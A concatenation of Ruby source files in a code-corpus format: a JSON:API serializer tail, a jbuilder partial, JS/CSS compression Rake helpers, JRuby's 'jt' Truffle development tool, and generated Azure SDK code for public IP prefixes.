temp_hash[:relationships] = relationships_hash(record, cachable_relationships_to_serialize, params) if cachable_relationships_to_serialize.present?
temp_hash[:links] = links_hash(record, params) if data_links.present?
temp_hash
end
record_hash[:relationships] = record_hash[:relationships].merge(relationships_hash(record, uncachable_relationships_to_serialize, params)) if uncachable_relationships_to_serialize.present?
record_hash
else
record_hash = id_hash(id_from_record(record), record_type, true)
record_hash[:attributes] = attributes_hash(record, params) if attributes_to_serialize.present?
record_hash[:relationships] = relationships_hash(record, nil, params) if relationships_to_serialize.present?
record_hash[:links] = links_hash(record, params) if data_links.present?
record_hash
end
end
def id_from_record(record)
return record.send(record_id) if record_id
raise MandatoryField, 'id is a mandatory field in the jsonapi spec' unless record.respond_to?(:id)
record.id
end
# Override #to_json for alternative implementation
def to_json(payload)
FastJsonapi::MultiToJson.to_json(payload) if payload.present?
end
def parse_include_item(include_item)
return [include_item.to_sym] unless include_item.to_s.include?('.')
include_item.to_s.split('.').map { |item| item.to_sym }
end
def remaining_items(items)
return unless items.size > 1
items_copy = items.dup
items_copy.delete_at(0)
[items_copy.join('.').to_sym]
end
# includes handler
def get_included_records(record, includes_list, known_included_objects, params = {})
return unless includes_list.present?
includes_list.sort.each_with_object([]) do |include_item, included_records|
items = parse_include_item(include_item)
items.each do |item|
next unless relationships_to_serialize && relationships_to_serialize[item]
record_type = @relationships_to_serialize[item][:record_type]
serializer = @relationships_to_serialize[item][:serializer].to_s.constantize
relationship_type = @relationships_to_serialize[item][:relationship_type]
included_objects = fetch_associated_object(record, @relationships_to_serialize[item], params)
next if included_objects.blank?
included_objects = [included_objects] unless relationship_type == :has_many
included_objects.each do |inc_obj|
serializer = (inc_obj.class.to_s + "Serializer").constantize if @relationships_to_serialize[item][:polymorphic].is_a?(Hash)
if remaining_items(items)
serializer_records = serializer.get_included_records(inc_obj, remaining_items(items), known_included_objects)
included_records.concat(serializer_records) unless serializer_records.empty?
end
code = "#{record_type}_#{inc_obj.class.to_s}_#{inc_obj.id}"
next if known_included_objects.key?(code)
known_included_objects[code] = inc_obj
included_records << serializer.record_hash(inc_obj, params)
end
end
end
end
def fetch_associated_object(record, relationship, params)
return relationship[:object_block].call(record, params) unless relationship[:object_block].nil?
record.send(relationship[:object_method_name])
end
def fetch_id(record, relationship, params)
unless relationship[:object_block].nil?
object = relationship[:object_block].call(record, params)
return object.map(&:id) if object.respond_to? :map
return object.id
end
record.public_send(relationship[:id_method_name])
end
end
end
end
| 39.663212 | 198 | 0.655389 |
91ddc53574783462b11196dadf06664259ef588e | 74 | json.partial! "subcategoria/subcategorium", subcategorium: @subcategorium
| 37 | 73 | 0.837838 |
ff286f469a7dbf98d177c3abceacacda2e0493d3 | 1,897 | require 'fileutils'
require 'find'
GEM_ROOT = File.expand_path(File.join(File.dirname(__FILE__), '..'))
GOOGLE_JS_COMPRESSOR = File.join(GEM_ROOT, 'lib', 'google-compiler-20110615.jar')
YUI_JS_COMPRESSOR = File.join(GEM_ROOT, 'lib', 'yuicompressor-2.4.4.jar')
def compress_js(scripts, compressor)
min_js = ''
if (compressor.downcase == "google")
cmd = %Q/java -jar "#{GOOGLE_JS_COMPRESSOR}" --charset utf8/
else
cmd = %Q/java -jar "#{YUI_JS_COMPRESSOR}" --type js --charset utf8/
end
IO.popen(cmd, 'r+') { |f| f.print(scripts); f.close_write; min_js = f.read }
min_js
end
def compress_css(src)
min_css = ''
cmd = %Q/java -jar "#{YUI_JS_COMPRESSOR}" --type css --charset utf8/
IO.popen(cmd, 'r+') { |f| f.print(src); f.close_write; min_css = f.read }
min_css
end
def concat_files(files)
out = ''
files.each do |file|
out += file
end
out
end
def all_files(pattern)
FileList[pattern].collect { |filename| File.read(filename) }.join "\n\n"
end
def handleTinyMCEDir(manifest, srcDir, destDir)
len = srcDir.length
actualDir = destDir
FileUtils.mkdir_p(destDir)
Find.find(srcDir) do |entry|
if File.directory?(entry) and entry != srcDir and entry != actualDir
actualDir = File.join(destDir, entry[len, 255])
FileUtils.mkdir_p(actualDir)
end
end
Find.find(srcDir) do |entry|
if File.file?(entry)
ending = entry[len, 255]
if /\.css$/ =~ entry or /\.htm$/ =~ entry
css = File.read entry
open File.join(destDir, ending), 'w' do |f|
f.write compress_css(css)
end
elsif /\.js$/ =~ entry
js = File.read entry
open File.join(destDir, ending), 'w' do |f|
f.write compress_js(js, "yui")
end
else
FileUtils.cp(entry, File.join(destDir, ending))
end
manifest.print "javascript 'tiny_mce/#{ending}'\n"
end
end
end
| 27.897059 | 81 | 0.637849 |
1a996af754060420b32ed70dfa61597824d2f767 | 15,621 | #!/usr/bin/env ruby
# Copyright (c) 2015 Oracle and/or its affiliates. All rights reserved. This
# code is released under a tri EPL/GPL/LGPL license. You can use it,
# redistribute it and/or modify it under the terms of the:
#
# Eclipse Public License version 1.0
# GNU General Public License version 2
# GNU Lesser General Public License version 2.1
# A workflow tool for JRuby+Truffle development
# Recommended: function jt { ruby tool/jt.rb "$@"; }
require 'fileutils'
require 'digest/sha1'
JRUBY_DIR = File.expand_path('../..', __FILE__)
JDEBUG_PORT = 51819
JDEBUG = "-J-agentlib:jdwp=transport=dt_socket,server=y,address=#{JDEBUG_PORT},suspend=y"
JEXCEPTION = "-Xtruffle.exceptions.print_java=true"
# wait for sub-processes to handle the interrupt
trap(:INT) {}
module Utilities
def self.graal_version
File.foreach("#{JRUBY_DIR}/truffle/pom.rb") do |line|
if /jar 'com.oracle:truffle:(\d+\.\d+(?:-SNAPSHOT)?)'/ =~ line
break $1
end
end
end
def self.find_graal
graal_locations = [
ENV['GRAAL_BIN'],
ENV["GRAAL_BIN_#{mangle_for_env(git_branch)}"],
"graalvm-jdk1.8.0/bin/java",
"../graalvm-jdk1.8.0/bin/java",
"../../graalvm-jdk1.8.0/bin/java",
].compact.map { |path| File.expand_path(path, JRUBY_DIR) }
not_found = -> {
raise "couldn't find graal - download it from http://lafo.ssw.uni-linz.ac.at/graalvm/ and extract it into the JRuby repository or parent directory"
}
graal_locations.find(not_found) do |location|
File.executable?(location)
end
end
def self.git_branch
@git_branch ||= `git rev-parse --abbrev-ref HEAD`.strip
end
def self.mangle_for_env(name)
name.upcase.tr('-', '_')
end
def self.find_graal_mx
mx = File.expand_path('../../../../mx.sh', find_graal)
raise "couldn't find mx.sh - set GRAAL_BIN, and you need to use a checkout of Graal, not a build" unless File.executable?(mx)
mx
end
def self.igv_running?
`ps a`.lines.any? { |p| p.include? 'mxtool/mx.py igv' }
end
def self.ensure_igv_running
unless igv_running?
spawn "#{find_graal_mx} igv", pgroup: true
sleep 5
puts
puts
puts "-------------"
puts "Waiting for IGV start"
puts "The first time you run IGV it may take several minutes to download dependencies and compile"
puts "Press enter when you see the IGV window"
puts "-------------"
puts
puts
$stdin.gets
end
end
def self.find_bench
bench_locations = [
ENV['BENCH_DIR'],
'bench9000',
'../bench9000'
].compact.map { |path| File.expand_path(path, JRUBY_DIR) }
not_found = -> {
raise "couldn't find bench9000 - clone it from https://github.com/jruby/bench9000.git into the JRuby repository or parent directory"
}
bench_locations.find(not_found) do |location|
Dir.exist?(location)
end
end
def self.jruby_version
File.read("#{JRUBY_DIR}/VERSION").strip
end
end
module ShellUtils
private
def raw_sh(*args)
puts "$ #{printable_cmd(args)}"
result = system(*args)
unless result
$stderr.puts "FAILED (#{$?}): #{printable_cmd(args)}"
exit $?.exitstatus
end
end
def printable_cmd(args)
env = {}
if Hash === args.first
env, *args = args
end
env = env.map { |k,v| "#{k}=#{shellescape(v)}" }.join(' ')
args = args.map { |a| shellescape(a) }.join(' ')
env.empty? ? args : "#{env} #{args}"
end
def shellescape(str)
if str.include?(' ')
if str.include?("'")
require 'shellwords'
Shellwords.escape(str)
else
"'#{str}'"
end
else
str
end
end
def sh(*args)
Dir.chdir(JRUBY_DIR) do
raw_sh(*args)
end
end
def mvn(*args)
sh './mvnw', *args
end
def mspec(command, *args)
env_vars = {}
if command.is_a?(Hash)
env_vars = command
command, *args = args
end
if ENV["JRUBY_ECLIPSE"] == "true"
args.unshift "-ttool/jruby_eclipse"
end
sh env_vars, 'ruby', 'spec/mspec/bin/mspec', command, '--config', 'spec/truffle/truffle.mspec', *args
end
end
module Commands
include ShellUtils
def help
puts 'jt build build'
puts 'jt build truffle build only the Truffle part, assumes the rest is up-to-date'
puts 'jt clean clean'
puts 'jt irb irb'
puts 'jt rebuild clean and build'
puts 'jt run [options] args... run JRuby with -X+T and args'
puts ' --graal use Graal (set GRAAL_BIN or it will try to automagically find it)'
puts ' --asm show assembly (implies --graal)'
puts ' --server run an instrumentation server on port 8080'
puts ' --igv make sure IGV is running and dump Graal graphs after partial escape (implies --graal)'
puts ' --jdebug run a JDWP debug server on 8000'
puts ' --jexception[s] print java exceptions'
puts 'jt e 14 + 2 evaluate an expression'
puts 'jt puts 14 + 2 evaluate and print an expression'
puts 'jt test run all mri tests and specs'
puts 'jt test mri run mri tests'
puts 'jt test specs run all specs'
puts 'jt test specs fast run all specs except sub-processes, GC, sleep, ...'
puts 'jt test spec/ruby/language run specs in this directory'
puts 'jt test spec/ruby/language/while_spec.rb run specs in this file'
puts 'jt test pe run partial evaluation tests'
puts 'jt tag spec/ruby/language tag failing specs in this directory'
puts 'jt tag spec/ruby/language/while_spec.rb tag failing specs in this file'
puts 'jt tag all spec/ruby/language tag all specs in this file, without running them'
puts 'jt untag spec/ruby/language untag passing specs in this directory'
puts 'jt untag spec/ruby/language/while_spec.rb untag passing specs in this file'
puts 'jt bench debug [--ruby-backtrace] benchmark run a single benchmark with options for compiler debugging'
puts 'jt bench reference [benchmarks] run a set of benchmarks and record a reference point'
puts 'jt bench compare [benchmarks] run a set of benchmarks and compare against a reference point'
puts ' benchmarks can be any benchmarks or group of benchmarks supported'
puts ' by bench9000, eg all, classic, chunky, 3, 5, 10, 15 - default is 5'
puts 'jt findbugs run findbugs'
puts 'jt findbugs report run findbugs and generate an HTML report'
puts 'jt install ..../graal/mx/suite.py install a JRuby distribution into an mx suite'
puts
puts 'you can also put build or rebuild in front of any command'
puts
puts 'recognised environment variables:'
puts
puts ' GRAAL_BIN GraalVM executable (java command) to use'
puts ' GRAAL_BIN_...git_branch_name... GraalVM executable to use for a given branch'
puts ' branch names are mangled - eg truffle-head becomes GRAAL_BIN_TRUFFLE_HEAD'
end
def build(project = nil)
case project
when 'truffle'
mvn '-pl', 'truffle', 'package'
when nil
mvn 'package'
else
raise ArgumentError, project
end
end
def clean
mvn 'clean'
end
def irb(*args)
run(*%w[-S irb], *args)
end
def rebuild
clean
build
end
def run(*args)
env_vars = args.first.is_a?(Hash) ? args.shift : {}
jruby_args = %w[-X+T -Xtruffle.core.load_path=truffle/src/main/ruby]
{ '--asm' => '--graal', '--igv' => '--graal' }.each_pair do |arg, dep|
args.unshift dep if args.include?(arg)
end
if args.delete('--graal')
env_vars["JAVACMD"] = Utilities.find_graal
jruby_args << '-J-server'
end
if args.delete('--asm')
jruby_args += %w[-J-XX:+UnlockDiagnosticVMOptions -J-XX:CompileCommand=print,*::callRoot]
end
if args.delete('--jdebug')
jruby_args << JDEBUG
end
if args.delete('--jexception') || args.delete('--jexceptions')
jruby_args << JEXCEPTION
end
if args.delete('--server')
jruby_args += %w[-Xtruffle.instrumentation_server_port=8080 -Xtruffle.passalot=1]
end
if args.delete('--igv')
warn "warning: --igv might not work on master - if it does not, use truffle-head instead which builds against latest graal" if Utilities.git_branch == 'master'
Utilities.ensure_igv_running
jruby_args += %w[-J-G:Dump=TrufflePartialEscape]
end
if ENV["JRUBY_ECLIPSE"] == "true"
jruby_bin = "#{JRUBY_DIR}/tool/jruby_eclipse"
else
jruby_bin = "#{JRUBY_DIR}/bin/jruby"
end
raw_sh env_vars, jruby_bin, *jruby_args, *args
end
alias ruby run
def e(*args)
run '-e', args.join(' ')
end
def command_puts(*args)
e 'puts begin', *args, 'end'
end
def command_p(*args)
e 'p begin', *args, 'end'
end
def test_mri(*args)
env_vars = {
"EXCLUDES" => "test/mri/excludes_truffle"
}
jruby_args = %w[-J-Xmx2G -Xtruffle.exceptions.print_java]
if args.empty?
args = File.readlines("#{JRUBY_DIR}/test/mri_truffle.index").grep(/^[^#]\w+/).map(&:chomp)
end
command = %w[test/mri/runner.rb -v --color=never --tty=no -q]
run(env_vars, *jruby_args, *command, *args)
end
private :test_mri
def test(*args)
path, *rest = args
case path
when nil
test_specs
test_mri
when 'pe' then test_pe(*rest)
when 'specs' then test_specs(*rest)
when 'mri' then test_mri(*rest)
else
if File.expand_path(path).start_with?("#{JRUBY_DIR}/test")
test_mri(*args)
else
test_specs(*args)
end
end
end
def test_pe(*args)
run('--graal', *args, 'test/truffle/pe/pe.rb')
end
private :test_pe
def test_specs(*args)
env_vars = {}
options = %w[--excl-tag fails]
if args.first == 'fast'
args.shift
options += %w[--excl-tag slow]
end
if args.delete('--graal')
env_vars["JAVACMD"] = Utilities.find_graal
options << '-T-J-server'
end
if args.delete('--jdebug')
options << "-T#{JDEBUG}"
end
if args.delete('--jexception') || args.delete('--jexceptions')
options << "-T#{JEXCEPTION}"
end
mspec env_vars, 'run', *options, *args
end
private :test_specs
def tag(path, *args)
return tag_all(*args) if path == 'all'
mspec 'tag', '--add', 'fails', '--fail', path, *args
end
# Add tags to all given examples without running them. Useful to avoid file exclusions.
def tag_all(*args)
mspec 'tag', *%w[--unguarded --all --dry-run --add fails], *args
end
private :tag_all
def untag(path, *args)
puts
puts "WARNING: untag is currently not very reliable - run `jt test #{[path,*args] * ' '}` after and manually annotate any new failures"
puts
mspec 'tag', '--del', 'fails', '--pass', path, *args
end
def bench(command, *args)
bench_dir = Utilities.find_bench
env_vars = {
"JRUBY_9000_DEV_DIR" => JRUBY_DIR,
"GRAAL_BIN" => Utilities.find_graal,
}
bench_args = ["-I#{bench_dir}/lib", "#{bench_dir}/bin/bench"]
case command
when 'debug'
if args.delete '--ruby-backtrace'
compilation_exceptions_behaviour = "-J-G:+TruffleCompilationExceptionsAreThrown"
else
compilation_exceptions_behaviour = "-J-G:+TruffleCompilationExceptionsAreFatal"
end
env_vars = env_vars.merge({'JRUBY_OPTS' => "-J-G:+TraceTruffleCompilation -J-G:+DumpOnError -J-G:-GraphPE #{compilation_exceptions_behaviour}"})
bench_args += ['score', 'jruby-9000-dev-truffle-graal', '--show-commands', '--show-samples']
raise 'specify a single benchmark for run - eg classic-fannkuch-redux' if args.size != 1
when 'reference'
bench_args += ['reference', 'jruby-9000-dev-truffle-graal', '--show-commands']
args << "5" if args.empty?
when 'compare'
bench_args += ['compare-reference', 'jruby-9000-dev-truffle-graal']
args << "5" if args.empty?
else
raise ArgumentError, command
end
raw_sh env_vars, "ruby", *bench_args, *args
end
def findbugs(report=nil)
case report
when 'report'
sh 'tool/truffle-findbugs.sh', '--report'
sh 'open', 'truffle-findbugs-report.html'
when nil
sh 'tool/truffle-findbugs.sh'
else
raise ArgumentError, report
end
end
def check_ambiguous_arguments
ENV.delete "JRUBY_ECLIPSE" # never run from the Eclipse launcher here
pom = "#{JRUBY_DIR}/truffle/pom.rb"
contents = File.read(pom)
contents.gsub!(/^(\s+)'source'\s*=>.+'1.7'.+,\n\s+'target'\s*=>.+\s*'1.7.+,\n/) do
indent = $1
$&.gsub("1.7", "1.8") + "#{indent}'fork' => 'true',\n"
end
contents.sub!(/^(\s+)('-J-Dfile.encoding=UTF-8')(.+\n)(?!\1'-parameters')/) do
"#{$1}#{$2},\n#{$1}'-parameters'#{$3}"
end
File.write pom, contents
FileUtils::Verbose.rm_r "#{JRUBY_DIR}/truffle/target/classes"
build('truffle')
run({ "TRUFFLE_CHECK_AMBIGUOUS_OPTIONAL_ARGS" => "true" }, '-e', 'exit')
end
def install(arg)
case arg
when /.*suite.*\.py$/
rebuild
mvn '-Pcomplete'
suite_file = arg
suite_lines = File.readlines(suite_file)
version = Utilities.jruby_version
[
['maven/jruby-complete/target', "jruby-complete"],
['truffle/target', "jruby-truffle"]
].each do |dir, name|
jar_name = "#{name}-#{version}.jar"
source_jar_path = "#{dir}/#{jar_name}"
shasum = Digest::SHA1.hexdigest File.read(source_jar_path)
jar_shasum_name = "#{name}-#{version}-#{shasum}.jar"
FileUtils.cp source_jar_path, "#{File.expand_path('../..', suite_file)}/lib/#{jar_shasum_name}"
line_index = suite_lines.find_index { |line| line.start_with? " \"path\" : \"lib/#{name}" }
suite_lines[line_index] = " \"path\" : \"lib/#{jar_shasum_name}\",\n"
suite_lines[line_index + 1] = " \#\"urls\" : [\"http://lafo.ssw.uni-linz.ac.at/truffle/ruby/#{jar_shasum_name}\"],\n"
suite_lines[line_index + 2] = " \"sha1\" : \"#{shasum}\"\n"
end
File.write(suite_file, suite_lines.join())
else
raise ArgumentError, kind
end
end
end
class JT
include Commands
def main(args)
args = args.dup
if args.empty? or %w[-h -help --help].include? args.first
help
exit
end
case args.first
when "rebuild"
send(args.shift)
when "build"
command = [args.shift]
command << args.shift if args.first == "truffle"
send(*command)
end
return if args.empty?
commands = Commands.public_instance_methods(false).map(&:to_s)
command, *rest = args
command = "command_#{command}" if %w[p puts].include? command
abort "no command matched #{command.inspect}" unless commands.include?(command)
begin
send(command, *rest)
rescue
puts "Error during command: #{args*' '}"
raise $!
end
end
end
JT.new.main(ARGV)
| 30.450292 | 165 | 0.601434 |
28245c41ee1ee6b97c5d2e11950210250fcf599b | 40,148 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2018_11_01
#
# PublicIPPrefixes
#
class PublicIPPrefixes
include MsRestAzure
#
# Creates and initializes a new instance of the PublicIPPrefixes class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [NetworkManagementClient] reference to the NetworkManagementClient
attr_reader :client
#
# Deletes the specified public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def delete(resource_group_name, public_ip_prefix_name, custom_headers:nil)
response = delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers).value!
nil
end
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_async(resource_group_name, public_ip_prefix_name, custom_headers:nil)
# Send request
promise = begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Gets the specified public IP prefix in a specified resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIPPrefix.
# @param expand [String] Expands referenced resources.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def get(resource_group_name, public_ip_prefix_name, expand:nil, custom_headers:nil)
response = get_async(resource_group_name, public_ip_prefix_name, expand:expand, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the specified public IP prefix in a specified resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIPPrefix.
# @param expand [String] Expands referenced resources.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, public_ip_prefix_name, expand:nil, custom_headers:nil)
get_async(resource_group_name, public_ip_prefix_name, expand:expand, custom_headers:custom_headers).value!
end
#
# Gets the specified public IP prefix in a specified resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIPPrefix.
# @param expand [String] Expands referenced resources.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, public_ip_prefix_name, expand:nil, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version,'$expand' => expand},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def create_or_update(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
# Send request
promise = begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def update_tags(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
# Send request
promise = begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<PublicIPPrefix>] operation results.
#
def list_all(custom_headers:nil)
first_page = list_all_as_lazy(custom_headers:custom_headers)
first_page.get_all_items
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_all_with_http_info(custom_headers:nil)
list_all_async(custom_headers:custom_headers).value!
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_all_async(custom_headers:nil)
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.Network/publicIPPrefixes'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<PublicIPPrefix>] operation results.
#
def list(resource_group_name, custom_headers:nil)
first_page = list_as_lazy(resource_group_name, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(resource_group_name, custom_headers:nil)
list_async(resource_group_name, custom_headers:custom_headers).value!
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(resource_group_name, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes the specified public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete(resource_group_name, public_ip_prefix_name, custom_headers:nil)
response = begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers).value!
nil
end
#
# Deletes the specified public IP prefix.
#
